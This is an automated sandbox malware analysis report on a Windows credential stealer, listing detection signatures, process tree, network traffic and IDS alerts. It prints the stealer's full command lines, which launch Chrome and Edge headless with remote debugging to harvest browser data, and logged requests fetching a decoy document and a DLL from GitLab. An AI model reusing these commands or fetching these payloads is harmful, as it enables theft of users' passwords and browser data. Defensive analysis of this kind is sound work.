Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
nNnzvybxiy.exe

Overview

General Information

Sample name:nNnzvybxiy.exe
renamed because original name is a hash value
Original sample name:531da4002b1052ababc8cffc1db0ac39dc616eb051faca146a393da3dfa478eb.exe
Analysis ID:1590652
MD5:5a59fdc67b0a65a89ad3f08de212d442
SHA1:abffa79db2d55fb9190ee9e0869de3086d477ab3
SHA256:531da4002b1052ababc8cffc1db0ac39dc616eb051faca146a393da3dfa478eb
Tags:bot7135076584exeuser-JAMESWT_MHT
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Yara detected Telegram Recon
AI detected suspicious sample
Drops password protected ZIP file
Sigma detected: Potential Data Stealing Via Chromium Headless Debugging
Tries to harvest and steal browser information (history, passwords, etc)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Browser Execution In Headless Mode
Sigma detected: Browser Started with Remote Debugging
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • nNnzvybxiy.exe (PID: 5472 cmdline: "C:\Users\user\Desktop\nNnzvybxiy.exe" MD5: 5A59FDC67B0A65A89AD3F08DE212D442)
    • msedge.exe (PID: 5640 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9568 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless MD5: 69222B8101B0601CC6663F8381E7E00F)
      • msedge.exe (PID: 6768 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1540 --field-trial-handle=1452,i,14790170528121727049,14815104510024520217,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • chrome.exe (PID: 7100 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9764 --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
      • chrome.exe (PID: 7176 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1588 --field-trial-handle=1492,i,15216651291747389405,13479732914116494807,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • WINWORD.EXE (PID: 7388 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Documents\Your_Benefits_and_Role.docx" /o "" MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
nNnzvybxiy.exeJoeSecurity_TelegramReconYara detected Telegram ReconJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    Process Memory Space: nNnzvybxiy.exe PID: 5472JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: Potential Data Stealing Via Chromium Headless Debugging
      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9568 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless, CommandLine: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9568 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless, CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, NewProcessName: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, OriginalFileName: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, ParentCommandLine: "C:\Users\user\Desktop\nNnzvybxiy.exe", ParentImage: C:\Users\user\Desktop\nNnzvybxiy.exe, ParentProcessId: 5472, ParentProcessName: nNnzvybxiy.exe, ProcessCommandLine: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9568 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --
      Sigma detected: Browser Execution In Headless Mode
      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9568 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless, CommandLine: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9568 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless, CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, NewProcessName: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, OriginalFileName: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, ParentCommandLine: "C:\Users\user\Desktop\nNnzvybxiy.exe", ParentImage: C:\Users\user\Desktop\nNnzvybxiy.exe, ParentProcessId: 5472, ParentProcessName: nNnzvybxiy.exe, ProcessCommandLine: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9568 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --
      Sigma detected: Browser Started with Remote Debugging
      Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9568 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless, CommandLine: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9568 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless, CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, NewProcessName: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, OriginalFileName: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, ParentCommandLine: "C:\Users\user\Desktop\nNnzvybxiy.exe", ParentImage: C:\Users\user\Desktop\nNnzvybxiy.exe, ParentProcessId: 5472, ParentProcessName: nNnzvybxiy.exe, ProcessCommandLine: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9568 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-14T12:48:10.843145+010028033053Unknown Traffic192.168.2.749701172.65.251.78443TCP
      2025-01-14T12:48:10.973026+010028033053Unknown Traffic192.168.2.749704172.217.16.206443TCP
      2025-01-14T12:48:10.977753+010028033053Unknown Traffic192.168.2.749703172.217.16.206443TCP
      2025-01-14T12:48:10.981681+010028033053Unknown Traffic192.168.2.749709172.217.16.206443TCP
      2025-01-14T12:48:10.982287+010028033053Unknown Traffic192.168.2.749708172.217.16.206443TCP
      2025-01-14T12:48:10.985819+010028033053Unknown Traffic192.168.2.749712172.217.16.206443TCP
      2025-01-14T12:48:10.998603+010028033053Unknown Traffic192.168.2.749711172.217.16.206443TCP
      2025-01-14T12:48:11.000647+010028033053Unknown Traffic192.168.2.749710172.217.16.206443TCP
      2025-01-14T12:48:11.004447+010028033053Unknown Traffic192.168.2.749705172.217.16.206443TCP
      2025-01-14T12:48:11.008321+010028033053Unknown Traffic192.168.2.749706172.217.16.206443TCP
      2025-01-14T12:48:11.008921+010028033053Unknown Traffic192.168.2.749707172.217.16.206443TCP
      2025-01-14T12:48:12.272299+010028033053Unknown Traffic192.168.2.749714142.250.186.100443TCP
      2025-01-14T12:48:12.277450+010028033053Unknown Traffic192.168.2.749723142.250.186.100443TCP
      2025-01-14T12:48:12.281430+010028033053Unknown Traffic192.168.2.749720142.250.186.100443TCP
      2025-01-14T12:48:12.284118+010028033053Unknown Traffic192.168.2.749718142.250.186.100443TCP
      2025-01-14T12:48:12.284370+010028033053Unknown Traffic192.168.2.749716142.250.186.100443TCP
      2025-01-14T12:48:12.302120+010028033053Unknown Traffic192.168.2.749717142.250.186.100443TCP
      2025-01-14T12:48:12.304866+010028033053Unknown Traffic192.168.2.749722142.250.186.100443TCP
      2025-01-14T12:48:12.308245+010028033053Unknown Traffic192.168.2.749721142.250.186.100443TCP
      2025-01-14T12:48:12.316105+010028033053Unknown Traffic192.168.2.749719142.250.186.100443TCP
      2025-01-14T12:48:12.368925+010028033053Unknown Traffic192.168.2.749715142.250.186.100443TCP
      2025-01-14T12:48:36.022912+010028033053Unknown Traffic192.168.2.749847172.65.251.78443TCP
      2025-01-14T12:48:38.580133+010028033053Unknown Traffic192.168.2.749864172.67.74.152443TCP
      2025-01-14T12:48:39.164451+010028033053Unknown Traffic192.168.2.749868172.67.74.152443TCP
      2025-01-14T12:48:39.632265+010028033053Unknown Traffic192.168.2.749871208.95.112.180TCP
      2025-01-14T12:48:40.245700+010028033053Unknown Traffic192.168.2.749875172.67.74.152443TCP
      2025-01-14T12:48:40.851981+010028033053Unknown Traffic192.168.2.749880172.67.74.152443TCP
      2025-01-14T12:48:41.325421+010028033053Unknown Traffic192.168.2.749885208.95.112.180TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 87.8% probability
      Source: unknownHTTPS traffic detected: 172.65.251.78:443 -> 192.168.2.7:49701 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.7:49712 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.7:49704 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.7:49709 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.7:49703 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.7:49708 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.7:49711 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.7:49710 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.7:49705 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.7:49707 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.7:49706 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.186.100:443 -> 192.168.2.7:49716 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.186.100:443 -> 192.168.2.7:49714 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.186.100:443 -> 192.168.2.7:49723 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.186.100:443 -> 192.168.2.7:49720 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.186.100:443 -> 192.168.2.7:49718 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.186.100:443 -> 192.168.2.7:49721 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.186.100:443 -> 192.168.2.7:49719 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.186.100:443 -> 192.168.2.7:49722 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.186.100:443 -> 192.168.2.7:49717 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.186.100:443 -> 192.168.2.7:49715 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.65.251.78:443 -> 192.168.2.7:49847 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.7:49864 version: TLS 1.2
      Source: nNnzvybxiy.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.core\obj\Release\netstandard2.0\SQLitePCLRaw.core.pdbSHA256r source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmp, nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.core\obj\Release\netstandard2.0\SQLitePCLRaw.core.pdb source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmp, nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.ProtectedData/Release/net8.0/System.Security.Cryptography.ProtectedData.pdb source: nNnzvybxiy.exe
      Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net6.0/Newtonsoft.Json.pdb source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF6795DA000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.Compression\Release\net8.0-windows\System.IO.Compression.pdb source: nNnzvybxiy.exe
      Source: Binary string: /_/artifacts/obj/EntityFramework/Release/netstandard2.1/EntityFramework.pdbSHA256kX source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF6795DA000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Process\Release\net8.0-windows\System.Diagnostics.Process.pdb source: nNnzvybxiy.exe
      Source: Binary string: C:\dev\sqlite\dotnet-private\System.Data.SQLite\obj\Release\netstandard2.1\System.Data.SQLite.pdb source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmp, nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.ProtectedData/Release/net8.0/System.Security.Cryptography.ProtectedData.pdbSHA256 source: nNnzvybxiy.exe
      Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.bundle_green\obj\Release\netstandard2.0\SQLitePCLRaw.batteries_v2.pdbSHA256@ source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmp, nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: System.Diagnostics.Process.ni.pdb source: nNnzvybxiy.exe
      Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.bundle_green\obj\Release\netstandard2.0\SQLitePCLRaw.batteries_v2.pdb source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmp, nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net6.0/Newtonsoft.Json.pdbSHA256(s source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF6795DA000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.provider.e_sqlite3\obj\Release\net6.0\SQLitePCLRaw.provider.e_sqlite3.pdbSHA256 source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmp, nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.provider.e_sqlite3\obj\Release\net6.0\SQLitePCLRaw.provider.e_sqlite3.pdb source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmp, nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: C:\Users\AnhXi\Downloads\Telegram Desktop\Projects\HK_NAVITE_DLL_v3_OKE\HK\bin\Release\net8.0\win-x64\native\oke.pdb source: nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF679802000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/artifacts/obj/EntityFramework/Release/netstandard2.1/EntityFramework.pdb source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF6795DA000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\cb\cb\cb\bld\bin\e_sqlite3\win\v142\plain\x64\e_sqlite3.pdb source: nNnzvybxiy.exe, 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmp, nNnzvybxiy.exe, 00000000.00000002.1574674815.000001DBF2107000.00000004.00001000.00020000.00000000.sdmp, e_sqlite3.dll.0.dr
      Source: Binary string: /_/artifacts/obj/System.Management/Release/net8.0-windows/System.Management.pdbSHA256 source: nNnzvybxiy.exe
      Source: Binary string: System.IO.Compression.ni.pdb source: nNnzvybxiy.exe
      Source: Binary string: C:\dev\sqlite\dotnet-private\System.Data.SQLite\obj\Release\netstandard2.1\System.Data.SQLite.pdbSHA256 source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmp, nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/artifacts/obj/System.Management/Release/net8.0-windows/System.Management.pdb source: nNnzvybxiy.exe
      Source: global trafficHTTP traffic detected: GET /app8490744/updatesa/-/raw/main/Your_Benefits_and_Role.docx?inline=false HTTP/1.1Host: gitlab.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.com
      Source: global trafficHTTP traffic detected: GET /hko247.black/libs/-/raw/da36e8916e710628358afbbd35fc9d73b2fd41c2/e_sqlite3.dll?inline=false HTTP/1.1Host: gitlab.com
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
      Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
      Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
      Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
      Source: Joe Sandbox ViewIP Address: 172.65.251.78 172.65.251.78
      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49885 -> 208.95.112.1:80
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49871 -> 208.95.112.1:80
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49709 -> 172.217.16.206:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49703 -> 172.217.16.206:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49714 -> 142.250.186.100:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49701 -> 172.65.251.78:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49718 -> 142.250.186.100:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49720 -> 142.250.186.100:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49717 -> 142.250.186.100:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49722 -> 142.250.186.100:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49715 -> 142.250.186.100:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49716 -> 142.250.186.100:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49707 -> 172.217.16.206:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49705 -> 172.217.16.206:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49704 -> 172.217.16.206:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49719 -> 142.250.186.100:443
